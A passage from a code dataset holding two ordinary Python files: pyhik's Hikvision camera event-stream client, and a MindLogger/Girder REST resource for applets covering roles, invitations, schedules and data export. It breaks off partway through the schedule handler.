source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
hikvision.py
|
"""
pyhik.hikvision
~~~~~~~~~~~~~~~~~~~~
Provides api for Hikvision events
Copyright (c) 2016-2020 John Mihalic <https://github.com/mezz64>
Licensed under the MIT license.
Based on the following api documentation:
System:
http://oversea-download.hikvision.com/uploadfile/Leaflet/ISAPI/HIKVISION%20ISAPI_2.0-IPMD%20Service.pdf
Imaging:
http://oversea-download.hikvision.com/uploadfile/Leaflet/ISAPI/HIKVISION%20ISAPI_2.0-Image%20Service.pdf
"""
import time
import datetime
import logging
import uuid
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
import threading
import requests
from requests.auth import HTTPDigestAuth
# Make pydispatcher optional to support legacy implentations
# New usage should implement the event_callback
try:
from pydispatch import dispatcher
except ImportError:
dispatcher = None
from pyhik.watchdog import Watchdog
from pyhik.constants import (
DEFAULT_PORT, DEFAULT_HEADERS, XML_NAMESPACE, SENSOR_MAP,
CAM_DEVICE, NVR_DEVICE, CONNECT_TIMEOUT, READ_TIMEOUT, CONTEXT_INFO,
CONTEXT_TRIG, CONTEXT_MOTION, CONTEXT_ALERT, CHANNEL_NAMES, ID_TYPES,
__version__)
_LOGGING = logging.getLogger(__name__)
# Hide nuisance requests logging
logging.getLogger('urllib3').setLevel(logging.ERROR)
"""
Things still to do:
- Support status of day/night and switching
IR switch URL:
http://X.X.X.X/ISAPI/Image/channels/1/ircutFilter
report IR status and allow
"""
# pylint: disable=too-many-instance-attributes
class HikCamera(object):
"""Creates a new Hikvision api device."""
def __init__(self, host=None, port=DEFAULT_PORT,
usr=None, pwd=None):
"""Initialize device."""
_LOGGING.debug("pyHik %s initializing new hikvision device at: %s",
__version__, host)
self.event_states = {}
self.watchdog = Watchdog(300.0, self.watchdog_handler)
if not host:
_LOGGING.error('Host not specified! Cannot continue.')
return
self.host = host
self.usr = usr
self.pwd = pwd
self.cam_id = 0
self.name = ''
self.device_type = None
self.motion_detection = None
self._motion_detection_xml = None
self.root_url = '{}:{}'.format(host, port)
self.namespace = {
CONTEXT_INFO: None,
CONTEXT_TRIG: None,
CONTEXT_ALERT: None,
CONTEXT_MOTION: None
}
# Build requests session for main thread calls
# Default to basic authentication. It will change to digest inside
# get_device_info if basic fails
self.hik_request = requests.Session()
self.hik_request.auth = (usr, pwd)
self.hik_request.headers.update(DEFAULT_HEADERS)
# Define event stream processing thread
self.kill_thrd = threading.Event()
self.reset_thrd = threading.Event()
self.thrd = threading.Thread(
target=self.alert_stream, args=(self.reset_thrd, self.kill_thrd,))
self.thrd.daemon = False
# Callbacks
self._updateCallbacks = []
self.initialize()
@property
def get_id(self):
"""Returns unique camera/nvr identifier."""
return self.cam_id
@property
def get_name(self):
"""Return camera/nvr name."""
return self.name
@property
def get_type(self):
"""Return device type."""
return self.device_type
@property
def current_event_states(self):
"""Return Event states dictionary"""
return self.event_states
@property
def current_motion_detection_state(self):
"""Return current state of motion detection property"""
return self.motion_detection
def get_motion_detection(self):
"""Fetch current motion state from camera"""
url = ('%s/ISAPI/System/Video/inputs/'
'channels/1/motionDetection') % self.root_url
try:
response = self.hik_request.get(url, timeout=CONNECT_TIMEOUT)
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to fetch MotionDetection, error: %s', err)
self.motion_detection = None
return self.motion_detection
if response.status_code == requests.codes.unauthorized:
_LOGGING.error('Authentication failed')
self.motion_detection = None
return self.motion_detection
if response.status_code != requests.codes.ok:
# If we didn't receive 200, abort
_LOGGING.debug('Unable to fetch motion detection.')
self.motion_detection = None
return self.motion_detection
try:
tree = ET.fromstring(response.text)
self.fetch_namespace(tree, CONTEXT_MOTION)
enabled = tree.find(self.element_query('enabled', CONTEXT_MOTION))
if enabled is not None:
self._motion_detection_xml = tree
self.motion_detection = {'true': True, 'false': False}[enabled.text]
return self.motion_detection
except AttributeError as err:
_LOGGING.error('Entire response: %s', response.text)
_LOGGING.error('There was a problem: %s', err)
self.motion_detection = None
return self.motion_detection
def enable_motion_detection(self):
"""Enable motion detection"""
self._set_motion_detection(True)
def disable_motion_detection(self):
"""Disable motion detection"""
self._set_motion_detection(False)
def _set_motion_detection(self, enable):
"""Set desired motion detection state on camera"""
url = ('%s/ISAPI/System/Video/inputs/'
'channels/1/motionDetection') % self.root_url
enabled = self._motion_detection_xml.find(self.element_query('enabled', CONTEXT_MOTION))
if enabled is None:
_LOGGING.error("Couldn't find 'enabled' in the xml")
_LOGGING.error('XML: %s', ET.tostring(self._motion_detection_xml))
return
enabled.text = 'true' if enable else 'false'
xml = ET.tostring(self._motion_detection_xml)
try:
response = self.hik_request.put(url, data=xml, timeout=CONNECT_TIMEOUT)
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to set MotionDetection, error: %s', err)
return
if response.status_code == requests.codes.unauthorized:
_LOGGING.error('Authentication failed')
return
if response.status_code != requests.codes.ok:
# If we didn't receive 200, abort
_LOGGING.error('Unable to set motion detection: %s', response.text)
self.motion_detection = enable
def add_update_callback(self, callback, sensor):
"""Register as callback for when a matching device sensor changes."""
self._updateCallbacks.append([callback, sensor])
_LOGGING.debug('Added update callback to %s on %s', callback, sensor)
def _do_update_callback(self, msg):
"""Call registered callback functions."""
for callback, sensor in self._updateCallbacks:
if sensor == msg:
_LOGGING.debug('Update callback %s for sensor %s',
callback, sensor)
callback(msg)
def element_query(self, element, context):
"""Build tree query for a given element and context."""
if context == CONTEXT_INFO:
return '{%s}%s' % (self.namespace[CONTEXT_INFO], element)
elif context == CONTEXT_TRIG:
return '{%s}%s' % (self.namespace[CONTEXT_TRIG], element)
elif context == CONTEXT_ALERT:
return '{%s}%s' % (self.namespace[CONTEXT_ALERT], element)
elif context == CONTEXT_MOTION:
return '{%s}%s' % (self.namespace[CONTEXT_MOTION], element)
else:
return '{%s}%s' % (XML_NAMESPACE, element)
def fetch_namespace(self, tree, context):
"""Determine proper namespace to find given element."""
if context == CONTEXT_INFO:
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_INFO] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device info namespace: %s', self.namespace[CONTEXT_INFO])
elif context == CONTEXT_TRIG:
try:
# For triggers we *typically* only care about the sub-namespace
nmsp = tree[0][1].tag.split('}')[0].strip('{')
except IndexError:
# If get a index error check on top level
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_TRIG] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device triggers namespace: %s', self.namespace[CONTEXT_TRIG])
elif context == CONTEXT_ALERT:
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_ALERT] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device alerts namespace: %s', self.namespace[CONTEXT_ALERT])
elif context == CONTEXT_MOTION:
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_MOTION] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device motion namespace: %s', self.namespace[CONTEXT_MOTION])
def initialize(self):
"""Initialize deviceInfo and available events."""
device_info = self.get_device_info()
if device_info is None:
self.name = None
self.cam_id = None
self.event_states = None
return
for key in device_info:
if key == 'deviceName':
self.name = device_info[key]
elif key == 'deviceID':
if len(device_info[key]) > 10:
self.cam_id = device_info[key]
else:
self.cam_id = uuid.uuid4()
events_available = self.get_event_triggers()
if events_available:
for event, channel_list in events_available.items():
for channel in channel_list:
try:
self.event_states.setdefault(
SENSOR_MAP[event.lower()], []).append(
[False, channel, 0, datetime.datetime.now()])
except KeyError:
# Sensor type doesn't have a known friendly name
# We can't reliably handle it at this time...
_LOGGING.warning(
'Sensor type "%s" is unsupported.', event)
_LOGGING.debug('Initialized Dictionary: %s', self.event_states)
else:
_LOGGING.debug('No Events available in dictionary.')
self.get_motion_detection()
def get_device_info(self):
"""Parse deviceInfo into dictionary."""
device_info = {}
url = '%s/ISAPI/System/deviceInfo' % self.root_url
using_digest = False
try:
response = self.hik_request.get(url, timeout=CONNECT_TIMEOUT)
if response.status_code == requests.codes.unauthorized:
_LOGGING.debug('Basic authentication failed. Using digest.')
self.hik_request.auth = HTTPDigestAuth(self.usr, self.pwd)
using_digest = True
response = self.hik_request.get(url)
if response.status_code == requests.codes.not_found:
# Try alternate URL for deviceInfo
_LOGGING.debug('Using alternate deviceInfo URL.')
url = '%s/System/deviceInfo' % self.root_url
response = self.hik_request.get(url)
# Seems to be difference between camera and nvr, they can't seem to
# agree if they should 404 or 401 first
if not using_digest and response.status_code == requests.codes.unauthorized:
_LOGGING.debug('Basic authentication failed. Using digest.')
self.hik_request.auth = HTTPDigestAuth(self.usr, self.pwd)
using_digest = True
response = self.hik_request.get(url)
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to fetch deviceInfo, error: %s', err)
return None
if response.status_code == requests.codes.unauthorized:
_LOGGING.error('Authentication failed')
return None
if response.status_code != requests.codes.ok:
# If we didn't receive 200, abort
_LOGGING.debug('Unable to fetch device info.')
return None
try:
tree = ET.fromstring(response.text)
self.fetch_namespace(tree, CONTEXT_INFO)
for item in tree:
tag = item.tag.split('}')[1]
device_info[tag] = item.text
return device_info
except AttributeError as err:
_LOGGING.error('Entire response: %s', response.text)
_LOGGING.error('There was a problem: %s', err)
return None
def get_event_triggers(self, base_url="default"):
"""
Returns dict of supported events.
Key = Event Type
List = Channels that have that event activated
"""
events = {}
nvrflag = False
event_xml = []
if base_url == "default":
url = '%s/ISAPI/Event/triggers' % self.root_url
else:
url = '%s/Event/triggers' % self.root_url
try:
response = self.hik_request.get(url, timeout=CONNECT_TIMEOUT)
if response.status_code != requests.codes.ok:
# Try alternate URL for triggers
_LOGGING.debug('Trying alternate triggers URL.')
return self.get_event_triggers("alt")
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to fetch events, error: %s', err)
return None
if response.status_code != 200:
# If we didn't recieve 200, abort
return None
# pylint: disable=too-many-nested-blocks
try:
content = ET.fromstring(response.text)
self.fetch_namespace(content, CONTEXT_TRIG)
if content[0].find(self.element_query('EventTrigger', CONTEXT_TRIG)):
event_xml = content[0].findall(
self.element_query('EventTrigger', CONTEXT_TRIG))
elif content.find(self.element_query('EventTrigger', CONTEXT_TRIG)):
# This is either an NVR or a rebadged camera
event_xml = content.findall(
self.element_query('EventTrigger', CONTEXT_TRIG))
for eventtrigger in event_xml:
ettype = eventtrigger.find(self.element_query('eventType', CONTEXT_TRIG))
# Catch empty xml defintions
if ettype is None:
break
etnotify = eventtrigger.find(
self.element_query('EventTriggerNotificationList', CONTEXT_TRIG))
etchannel = None
etchannel_num = 0
for node_name in CHANNEL_NAMES:
etchannel = eventtrigger.find(
self.element_query(node_name, CONTEXT_TRIG))
if etchannel is not None:
try:
# Need to make sure this is actually a number
etchannel_num = int(etchannel.text)
if etchannel_num > 1:
# Must be an nvr
nvrflag = True
break
except ValueError:
# Field must not be an integer
pass
if etnotify:
for notifytrigger in etnotify:
ntype = notifytrigger.find(
self.element_query('notificationMethod', CONTEXT_TRIG))
if ntype.text == 'center' or ntype.text == 'HTTP':
"""
If we got this far we found an event that we want
to track.
"""
events.setdefault(ettype.text, []) \
.append(etchannel_num)
except (AttributeError, ET.ParseError) as err:
_LOGGING.error(
'There was a problem finding an element: %s', err)
return None
if nvrflag:
self.device_type = NVR_DEVICE
else:
self.device_type = CAM_DEVICE
_LOGGING.debug('Processed %s as %s Device.',
self.cam_id, self.device_type)
_LOGGING.debug('Found events: %s', events)
self.hik_request.close()
return events
def watchdog_handler(self):
"""Take care of threads if wachdog expires."""
_LOGGING.debug('%s Watchdog expired. Resetting connection.', self.name)
self.watchdog.stop()
self.reset_thrd.set()
def disconnect(self):
"""Disconnect from event stream."""
_LOGGING.debug('Disconnecting from stream: %s', self.name)
self.kill_thrd.set()
self.thrd.join()
_LOGGING.debug('Event stream thread for %s is stopped', self.name)
self.kill_thrd.clear()
def start_stream(self):
"""Start thread to process event stream."""
# self.watchdog.start()
self.thrd.start()
def alert_stream(self, reset_event, kill_event):
"""Open event stream."""
_LOGGING.debug('Stream Thread Started: %s, %s', self.name, self.cam_id)
start_event = False
parse_string = ""
fail_count = 0
url = '%s/ISAPI/Event/notification/alertStream' % self.root_url
# pylint: disable=too-many-nested-blocks
while True:
try:
stream = self.hik_request.get(url, stream=True,
timeout=(CONNECT_TIMEOUT,
READ_TIMEOUT))
if stream.status_code == requests.codes.not_found:
# Try alternate URL for stream
url = '%s/Event/notification/alertStream' % self.root_url
stream = self.hik_request.get(url, stream=True)
if stream.status_code != requests.codes.ok:
raise ValueError('Connection unsucessful.')
else:
_LOGGING.debug('%s Connection Successful.', self.name)
fail_count = 0
self.watchdog.start()
for line in stream.iter_lines():
# _LOGGING.debug('Processing line from %s', self.name)
# filter out keep-alive new lines
if line:
str_line = line.decode("utf-8", "ignore")
# New events start with --boundry
if str_line.find('<EventNotificationAlert') != -1:
# Start of event message
start_event = True
parse_string = str_line
elif str_line.find('</EventNotificationAlert>') != -1:
# Message end found found
parse_string += str_line
start_event = False
if parse_string:
try:
tree = ET.fromstring(parse_string)
self.process_stream(tree)
self.update_stale()
except ET.ParseError as err:
_LOGGING.warning('XML parse error in stream.')
parse_string = ""
else:
if start_event:
parse_string += str_line
if kill_event.is_set():
# We were asked to stop the thread so lets do so.
break
elif reset_event.is_set():
# We need to reset the connection.
raise ValueError('Watchdog failed.')
if kill_event.is_set():
# We were asked to stop the thread so lets do so.
_LOGGING.debug('Stopping event stream thread for %s',
self.name)
self.watchdog.stop()
self.hik_request.close()
return
elif reset_event.is_set():
# We need to reset the connection.
raise ValueError('Watchdog failed.')
except (ValueError,
requests.exceptions.ConnectionError,
requests.exceptions.ChunkedEncodingError) as err:
fail_count += 1
reset_event.clear()
_LOGGING.warning('%s Connection Failed (count=%d). Waiting %ss. Err: %s',
self.name, fail_count, (fail_count * 5) + 5, err)
parse_string = ""
self.watchdog.stop()
self.hik_request.close()
time.sleep(5)
self.update_stale()
time.sleep(fail_count * 5)
continue
def process_stream(self, tree):
"""Process incoming event stream packets."""
if not self.namespace[CONTEXT_ALERT]:
self.fetch_namespace(tree, CONTEXT_ALERT)
try:
etype = SENSOR_MAP[tree.find(
self.element_query('eventType', CONTEXT_ALERT)).text.lower()]
estate = tree.find(
self.element_query('eventState', CONTEXT_ALERT)).text
for idtype in ID_TYPES:
echid = tree.find(self.element_query(idtype, CONTEXT_ALERT))
if echid is not None:
try:
# Need to make sure this is actually a number
echid = int(echid.text)
break
except (ValueError, TypeError) as err:
# Field must not be an integer or is blank
pass
ecount = tree.find(
self.element_query('activePostCount', CONTEXT_ALERT)).text
except (AttributeError, KeyError, IndexError) as err:
_LOGGING.error('Problem finding attribute: %s', err)
return
# Take care of keep-alive
if len(etype) > 0 and etype == 'Video Loss':
self.watchdog.pet()
# Track state if it's in the event list.
if len(etype) > 0:
state = self.fetch_attributes(etype, echid)
if state:
# Determine if state has changed
# If so, publish, otherwise do nothing
estate = (estate == 'active')
old_state = state[0]
attr = [estate, echid, int(ecount),
datetime.datetime.now()]
self.update_attributes(etype, echid, attr)
if estate != old_state:
self.publish_changes(etype, echid)
self.watchdog.pet()
def update_stale(self):
"""Update stale active statuses"""
# Some events don't post an inactive XML, only active.
# If we don't get an active update for 5 seconds we can
# assume the event is no longer active and update accordingly.
for etype, echannels in self.event_states.items():
for eprop in echannels:
if eprop[3] is not None:
sec_elap = ((datetime.datetime.now()-eprop[3])
.total_seconds())
# print('Seconds since last update: {}'.format(sec_elap))
if sec_elap > 5 and eprop[0] is True:
_LOGGING.debug('Updating stale event %s on CH(%s)',
etype, eprop[1])
attr = [False, eprop[1], eprop[2],
datetime.datetime.now()]
self.update_attributes(etype, eprop[1], attr)
self.publish_changes(etype, eprop[1])
def publish_changes(self, etype, echid):
"""Post updates for specified event type."""
_LOGGING.debug('%s Update: %s, %s',
self.name, etype, self.fetch_attributes(etype, echid))
signal = 'ValueChanged.{}'.format(self.cam_id)
sender = '{}.{}'.format(etype, echid)
if dispatcher:
dispatcher.send(signal=signal, sender=sender)
self._do_update_callback('{}.{}.{}'.format(self.cam_id, etype, echid))
def fetch_attributes(self, event, channel):
"""Returns attribute list for a given event/channel."""
try:
for sensor in self.event_states[event]:
if sensor[1] == int(channel):
return sensor
except KeyError:
return None
def update_attributes(self, event, channel, attr):
"""Update attribute list for current event/channel."""
try:
for i, sensor in enumerate(self.event_states[event]):
if sensor[1] == int(channel):
self.event_states[event][i] = attr
except KeyError:
_LOGGING.debug('Error updating attributes for: (%s, %s)',
event, channel)
|
applet.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2013 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import itertools
import re
import threading
import uuid
import requests
from datetime import datetime
from ..describe import Description, autoDescribeRoute
from ..rest import Resource, rawResponse
from bson.objectid import ObjectId
from girderformindlogger.constants import AccessType, SortDir, TokenScope, \
DEFINED_INFORMANTS, REPROLIB_CANONICAL, SPECIAL_SUBJECTS, USER_ROLES
from girderformindlogger.api import access
from girderformindlogger.exceptions import AccessException, ValidationException
from girderformindlogger.models.activity import Activity as ActivityModel
from girderformindlogger.models.applet import Applet as AppletModel
from girderformindlogger.models.collection import Collection as CollectionModel
from girderformindlogger.models.folder import Folder as FolderModel
from girderformindlogger.models.group import Group as GroupModel
from girderformindlogger.models.item import Item as ItemModel
from girderformindlogger.models.protocol import Protocol as ProtocolModel
from girderformindlogger.models.roles import getCanonicalUser, getUserCipher
from girderformindlogger.models.user import User as UserModel
from girderformindlogger.models.pushNotification import PushNotification as PushNotificationModel
from girderformindlogger.utility import config, jsonld_expander
from pyld import jsonld
USER_ROLE_KEYS = USER_ROLES.keys()
class Applet(Resource):
def __init__(self):
super(Applet, self).__init__()
self.resourceName = 'applet'
self._model = AppletModel()
self.route('GET', (':id',), self.getApplet)
self.route('GET', (':id', 'data'), self.getAppletData)
self.route('GET', (':id', 'groups'), self.getAppletGroups)
self.route('POST', (), self.createApplet)
self.route('PUT', (':id', 'informant'), self.updateInformant)
self.route('PUT', (':id', 'assign'), self.assignGroup)
self.route('PUT', (':id', 'constraints'), self.setConstraints)
self.route('PUT', (':id', 'schedule'), self.setSchedule)
self.route('GET', (':id',), self.getSchedule)
self.route('POST', (':id', 'invite'), self.invite)
self.route('GET', (':id', 'roles'), self.getAppletRoles)
self.route('GET', (':id', 'users'), self.getAppletUsers)
self.route('DELETE', (':id',), self.deactivateApplet)
@access.user(scope=TokenScope.DATA_OWN)
@autoDescribeRoute(
Description('Get userlist, groups & statuses.')
.modelParam(
'id',
model=FolderModel,
level=AccessType.ADMIN,
destName='applet'
)
)
def getAppletUsers(self, applet):
thisUser=self.getCurrentUser()
if AppletModel().isCoordinator(applet['_id'], thisUser):
return(AppletModel().getAppletUsers(applet, thisUser, force=True))
else:
raise AccessException(
"Only coordinators and managers can see user lists."
)
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Assign a group to a role in an applet.')
.deprecated()
.responseClass('Folder')
.modelParam('id', model=FolderModel, level=AccessType.READ)
.param(
'group',
'ID of the group to assign.',
required=True,
strip=True
)
.param(
'role',
'Role to invite this user to. One of ' + str(USER_ROLE_KEYS),
default='user',
required=False,
strip=True
)
.jsonParam(
'subject',
'Requires a JSON Object in the form \n```'
'{'
' "groups": {'
' "«relationship»": []'
' },'
' "users": {'
' "«relationship»": []'
' }'
'}'
'``` \n For \'user\' or \'reviewer\' assignments, specify '
'group-level relationships, filling in \'«relationship»\' with a '
'JSON-ld key semantically defined in in your context, and IDs in '
'the value Arrays (either applet-specific or canonical IDs in the '
'case of users; applet-specific IDs will be stored either way).',
paramType='form',
required=False,
requireObject=True
)
.errorResponse('ID was invalid.')
.errorResponse('Write access was denied for the folder or its new parent object.', 403)
)
def assignGroup(self, folder, group, role, subject):
applet = folder
if role not in USER_ROLE_KEYS:
raise ValidationException(
'Invalid role.',
'role'
)
thisUser=self.getCurrentUser()
group=GroupModel().load(group, level=AccessType.WRITE, user=thisUser)
return(
AppletModel().setGroupRole(
applet,
group,
role,
currentUser=thisUser,
force=False,
subject=subject
)
)
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Create an applet.')
.param(
'protocolUrl',
'URL of Activity Set from which to create applet',
required=False
)
.param(
'name',
'Name to give the applet. The Protocol\'s name will be used if '
'this parameter is not provided.',
required=False
)
.param(
'informant',
' '.join([
'Relationship from informant to individual of interest.',
'Currently handled informant relationships are',
str([r for r in DEFINED_INFORMANTS.keys()])
]),
required=False
)
.errorResponse('Write access was denied for this applet.', 403)
)
def createApplet(self, protocolUrl=None, name=None, informant=None):
thisUser = self.getCurrentUser()
thread = threading.Thread(
target=AppletModel().createAppletFromUrl,
kwargs={
'name': name,
'protocolUrl': protocolUrl,
'user': thisUser,
'constraints': {
'informantRelationship': informant
} if informant is not None else None
}
)
thread.start()
return({
"message": "The applet is being created. Please check back in "
"several mintutes to see it. If you have an email "
"address associated with your account, you will receive "
"an email when your applet is ready."
})
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Get all data you are authorized to see for an applet.')
.param(
'id',
'ID of the applet for which to fetch data',
required=True
)
.param(
'format',
'JSON or CSV',
required=False
)
.errorResponse('Write access was denied for this applet.', 403)
)
def getAppletData(self, id, format='json'):
import pandas as pd
from datetime import datetime
from ..rest import setContentDisposition, setRawResponse, setResponseHeader
format = ('json' if format is None else format).lower()
thisUser = self.getCurrentUser()
data = AppletModel().getResponseData(id, thisUser)
setContentDisposition("{}-{}.{}".format(
str(id),
datetime.now().isoformat(),
format
))
if format=='csv':
setRawResponse()
setResponseHeader('Content-Type', 'text/{}'.format(format))
csv = pd.DataFrame(data).to_csv(index=False)
return(csv)
setResponseHeader('Content-Type', 'application/{}'.format(format))
return(data)
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('(managers only) Update the informant of an applet.')
.modelParam(
'id',
model=AppletModel,
description='ID of the applet to update',
destName='applet',
force=True,
required=True
)
.param(
'informant',
' '.join([
'Relationship from informant to individual of interest.',
'Currently handled informant relationships are',
str([r for r in DEFINED_INFORMANTS.keys()])
]),
required=True
)
.errorResponse('Write access was denied for this applet.', 403)
)
def updateInformant(self, applet, informant):
user = self.getCurrentUser()
if not AppletModel().isManager(applet['_id'], user):
raise AccessException(
"Only managers can update informant relationship"
)
AppletModel().updateRelationship(applet, informant)
return(
jsonld_expander.formatLdObject(
applet,
'applet',
user,
refreshCache=False
)
)
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Deactivate an applet by ID.')
.modelParam('id', model=AppletModel, level=AccessType.WRITE)
.errorResponse('Invalid applet ID.')
.errorResponse('Write access was denied for this applet.', 403)
)
def deactivateApplet(self, folder):
applet = folder
user = Applet().getCurrentUser()
applet['meta']['applet']['deleted'] = True
applet = AppletModel().setMetadata(applet, applet.get('meta'), user)
if applet.get('meta', {}).get('applet', {}).get('deleted')==True:
message = 'Successfully deactivated applet {} ({}).'.format(
AppletModel().preferredName(applet),
applet.get('_id')
)
thread = threading.Thread(
target=AppletModel().updateAllUserCaches(applet, user)
)
else:
message = 'Could not deactivate applet {} ({}).'.format(
AppletModel().preferredName(applet),
applet.get('_id')
)
Description().errorResponse(message, 403)
return(message)
@access.user(scope=TokenScope.DATA_READ)
@autoDescribeRoute(
Description('Get an applet by ID.')
.modelParam(
'id',
model=AppletModel,
level=AccessType.READ,
destName='applet'
)
.param(
'refreshCache',
'Reparse JSON-LD',
required=False,
dataType='boolean'
)
.errorResponse('Invalid applet ID.')
.errorResponse('Read access was denied for this applet.', 403)
)
def getApplet(self, applet, refreshCache=False):
user = self.getCurrentUser()
if refreshCache:
thread = threading.Thread(
target=jsonld_expander.formatLdObject,
args=(applet, 'applet', user),
kwargs={'refreshCache': refreshCache}
)
thread.start()
return({
"message": "The applet is being refreshed. Please check back "
"in several mintutes to see it."
})
return(
jsonld_expander.formatLdObject(
applet,
'applet',
user,
refreshCache=refreshCache
)
)
@access.user(scope=TokenScope.DATA_READ)
@autoDescribeRoute(
Description('Get associated groups for a given role and applet ID.')
.modelParam('id', 'ID of the Applet.', model=AppletModel, level=AccessType.READ)
.param(
'role',
'One of ' + str(set(USER_ROLE_KEYS)),
default='user',
required=False,
strip=True
)
.errorResponse('Invalid applet ID.')
.errorResponse('Read access was denied for this applet.', 403)
)
def getAppletGroups(self, folder, role):
applet = folder
user = self.getCurrentUser()
groups = [
group for group in AppletModel(
).getAppletGroups(applet).get(role) if ObjectId(group) in [
*user.get('groups', []),
*user.get('formerGroups', []),
*[invite['groupId'] for invite in [
*user.get('groupInvites', []),
*user.get('declinedInvites', [])
]]
]
]
return(
groups
)
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Get roles for an applet by ID.')
.modelParam(
'id',
model=AppletModel,
level=AccessType.WRITE,
description='ID of the Applet.'
)
.errorResponse('Invalid applet ID.')
.errorResponse('Write access was denied for this applet.', 403)
.notes('Only users with write access can see roles.')
)
def getAppletRoles(self, folder):
applet = folder
user = Applet().getCurrentUser()
return(AppletModel().getFullRolesList(applet))
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Invite a user to a role in an applet.')
.modelParam(
'id',
model=AppletModel,
level=AccessType.READ,
destName='applet'
)
.param(
'role',
'Role to invite this user to. One of ' + str(set(USER_ROLE_KEYS)),
default='user',
required=False,
strip=True
)
.param(
'idCode',
'ID code for data reporting. One will be generated if none is '
'provided.',
required=False,
strip=True
)
.jsonParam(
'profile',
'Optional, coordinator-defined user profile information, eg, '
'`displayName`, `email`',
required=False,
paramType='form'
)
.errorResponse('ID was invalid.')
.errorResponse('Write access was denied for the folder or its new parent object.', 403)
)
def invite(self, applet, role="user", idCode=None, profile=None):
from girderformindlogger.models.invitation import Invitation
from girderformindlogger.models.profile import Profile
user = self.getCurrentUser()
try:
if role not in USER_ROLE_KEYS:
raise ValidationException(
'Invalid role.',
'role'
)
invitation = Invitation().createInvitation(
applet=applet,
coordinator=user,
role=role,
profile=profile,
idCode=idCode
)
return(Profile().displayProfileFields(invitation, user))
except:
import sys, traceback
print(sys.exc_info())
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Deprecated. Do not use')
.modelParam('id', model=AppletModel, level=AccessType.READ)
.param(
'activity',
'Deprecated. Do not use.'
'schedule.',
required=False
)
.jsonParam(
'schedule',
'Deprecated. Do not use.',
paramType='form',
required=False
)
.errorResponse('Invalid applet ID.')
.errorResponse('Read access was denied for this applet.', 403)
.deprecated()
)
def setConstraints(self, folder, activity, schedule, **kwargs):
thisUser = self.getCurrentUser()
applet = jsonld_expander.formatLdObject(
_setConstraints(folder, activity, schedule, thisUser),
'applet',
thisUser,
refreshCache=True
)
thread = threading.Thread(
target=AppletModel().updateUserCacheAllUsersAllRoles,
args=(applet, thisUser)
)
thread.start()
return(applet)
@access.user(scope=TokenScope.DATA_READ)
@autoDescribeRoute(
Description('Get schedule information for an applet.')
.modelParam(
'id',
model=AppletModel,
level=AccessType.READ,
destName='applet'
)
.param(
'refreshCache',
'Reparse JSON-LD',
required=False,
dataType='boolean'
)
.errorResponse('Invalid applet ID.')
.errorResponse('Read access was denied for this applet.', 403)
)
def getSchedule(self, applet, refreshCache=False):
user = self.getCurrentUser()
if refreshCache:
thread = threading.Thread(
target=jsonld_expander.formatLdObject,
args=(applet, 'applet', user),
kwargs={'refreshCache': refreshCache}
)
thread.start()
return({
"message": "The applet is being refreshed. Please check back "
"in several mintutes to see it."
})
return(
jsonld_expander.formatLdObject(
applet,
'applet',
user,
refreshCache=refreshCache
)
)
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Set or update schedule information for an applet.')
.modelParam(
'id',
model=AppletModel,
level=AccessType.READ,
destName='applet'
)
.jsonParam(
'schedule',
'A JSON object containing schedule information for an applet',
paramType='form',
required=False
)
.errorResponse('Invalid applet ID.')
.errorResponse('Read access was denied for this applet.', 403)
)
def setSchedule(self, applet, schedule, **kwargs):
thisUser = self.getCurrentUser()
if not AppletModel().isCoordinator(applet['_id'], thisUser):
raise AccessException(
"Only coordinators and managers can update applet schedules."
)
if 'events' in schedule:
for event in schedule['events']:
if event['data']['useNotifications']:
if event['data']['notifications'][0]['start']:
sendTime = event['data']['notifications'][0]['start']
else:
sendTime = '09:00'
sendTime = (str(event['schedule']['year'][0]) + '/' +
('0' + str(event['schedule']['month'][0] + 1))[-2:] + '/' +
('0' + str(event['schedule']['dayOfMonth'][0]))[-2:] + ' ' +
sendTime)
existNotification = PushNotificationModel().findOne(query={'applet':applet['_id'],
'creator_id':thisUser['_id'],
'sendTime':str(sendTime)})
if not existNotification:
PushNotificationModel().createNotification( applet['_id'], 1,
event['data']['title'], event['data']['description'],
str(sendTime), thisUser['_id'])
appletMeta = applet['meta'] if 'meta' in applet else {'applet': {}}
if 'applet' not in appletMeta:
appletMeta['applet'] = {}
appletMeta['applet']['schedule'] = schedule
AppletModel().setMetadata(applet, appletMeta)
thread = threading.Thread(
